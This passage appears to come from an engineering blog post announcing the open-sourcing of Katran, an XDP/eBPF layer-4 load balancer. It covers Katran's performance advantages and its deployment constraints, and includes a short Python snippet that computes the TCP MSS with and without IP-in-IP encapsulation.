Figure 4: Katran enables a fast path for processing packets at high speed without resorting to a full-fledged kernel bypass. Note that the packets cross the kernel/user-space boundary only once. This allows us to colocate the L4LB and backend application without sacrificing performance.

These features dramatically enhance the performance, flexibility and scalability of the L4LB. Katran’s design also gets rid of busy loops on the receive path, so it consumes barely any CPU when there are no incoming packets. In contrast to a full-fledged kernel bypass solution (such as DPDK), using XDP allows us to run Katran alongside any application on the same host without any performance penalties. Katran today runs alongside the backend servers in our PoPs with an improved L4LB-to-backend ratio. This increases resilience to load spikes, host failures, and maintenance as well. The reengineered forwarding plane was central to this shift. We believe other systems can benefit by using our forwarding plane, so we are open-sourcing our code and including several examples of how to use it to craft an L4LB.

Additional Considerations

Katran operates under certain assumptions and constraints that enable the performance improvements. In practice, we found these constraints to be fairly reasonable, and they did not block our deployment. We believe that most users of our library will find them easy to satisfy. We’ve listed them below:

  • Katran works only in direct server return (DSR) mode.
  • Katran is the component that decides the final destination of a packet addressed to a VIP, so the network needs to route packets to Katran first. This requires the network topology to be L3 based, i.e., packets are routed by IP rather than by MAC addresses.
  • Katran cannot forward fragmented packets, nor can it fragment them by itself. This could be mitigated either by increasing the maximal transmission unit (MTU) inside the network or by changing advertised TCP MSS from the backends. (The latter step is recommended even if you have increased the MTU.)
  • Katran doesn’t support packets with IP options set. The maximum packet size cannot exceed 3.5 KB.
  • Katran was built with the assumption that it’s going to be used in a “load balancer on a stick” scenario, where a single interface would be used for traffic both “from user to L4LB (ingress)” and “from L4LB to L7LB (egress).”
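
The fragmentation constraint above comes down to simple arithmetic, sketched here for the IPv4 case. The figures assume 20-byte IPv4 and TCP headers without options and a 1500-byte MTU; the function name is ours, and other encapsulations or header options would change the numbers.

```python
IPV4_HEADER = 20  # bytes, no options
TCP_HEADER = 20   # bytes, no options

def advertised_mss(mtu, outer_header=IPV4_HEADER):
    """Largest TCP payload that still fits in one MTU after encapsulation."""
    return mtu - outer_header - IPV4_HEADER - TCP_HEADER

mss_plain = advertised_mss(1500, outer_header=0)  # no encapsulation
mss_ipip = advertised_mss(1500)                   # IP-in-IP adds one outer IPv4 header
print(mss_plain, mss_ipip)
```

If the backends advertise the smaller value, a full-sized client segment plus the outer header still fits in a single packet, so Katran never has to forward a fragment.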

Despite these limitations, we believe that Katran offers an excellent forwarding plane to users and organizations who intend to leverage the exciting combination of XDP and eBPF to build efficient load balancers. We look forward to answering any questions from prospective adopters on our GitHub repository — and pull requests are always welcome!